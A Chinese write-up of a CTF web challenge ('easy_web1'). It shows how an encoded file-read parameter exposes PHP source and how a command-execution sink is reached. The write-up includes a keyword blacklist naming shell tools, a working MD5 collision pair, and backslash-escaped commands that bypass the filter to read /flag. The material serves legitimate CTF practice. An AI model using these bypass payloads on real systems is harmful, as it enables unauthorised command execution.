[安洵杯 2019]easy_web1

今天玩ctf遇见一个比较有意思的题。闲来无事分享分享。

启动靶机后来到这个页面

 

web大法第一步，右键源代码，发现了一堆base64编码。

点击后发现就是主页面左上角的图片的内容经过编码后的呈现。似乎没什么作用

然后又拿着后台扫描工具一顿乱扫什么也没发现。。。

然后注意到参数自带“&cmd=”，尝试输入命令ls

 

forbid！！！看来确实存在cmd参数，并且ls命令被过滤了。尝试dir命令

 似乎dir没被过滤，但是仍然没有显示，只要不触发关键字都是“md5 is funny”，所以猜测这里无法回显。

然后奇葩的来了，尝试其他方法找不到破绽。

“?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=”，img的值像不像base64编码。。。

对"TXpVek5UTTFNbVUzTURabE5qYz0&cmd="进行base64解码"MzUzNTM1MmU3MDZ1Njc=>rg@"，再次base64解码得到一串字符串，这是经过hex编码的。解码后就是 555.png。带着555.png去访问，发现仍然是主页面左上角的图片。

这里大概就可以理解了，可能存在一个文件包含，并将内容编码呈现出来。这里也没其他内容，直接读取index.php

index.php->hex编码->base64->base64->"TmprMlpUWTBOalUzT0RKbE56QTJPRGN3"

直接访问，右键源代码，将呈现出来的内容进行解码

';
    die("xixi锝?no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "";
    echo "
";
}
echo $cmd;
echo "
";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "
";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>

img参数应该不太可能实现了。。。分析cmd参数吧

1.这里注意echo `$cmd`,它的意思是将$cmd作为命令执行并输出。所以这里可以执行命令

2.这里过滤了许多，重点在这"|\\|\\\\|"，php中会经历两次解析，php解析与正则解析。第一次php转义为"|\|\\|",第二次正则转义，将中间的|转义为普通字符，结果为"||\|"。所以实际上匹配的是"|\"。它没有过滤"\"符号。

3.md5碰撞，因为这里有string。没有办法再用数组和科学计数法的方法，所以只能使用真实的碰撞。

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

分析完后进行抓包，构造payload

ok，md5成功绕过。dir命令执行成功。最后一步读取flag。

l\s /

 

已经看见flag了，只需要cat就行了

ca\t /flag

 

这题第一步真的难想到，那个cmd可以传参同时也是base64编码。妙啊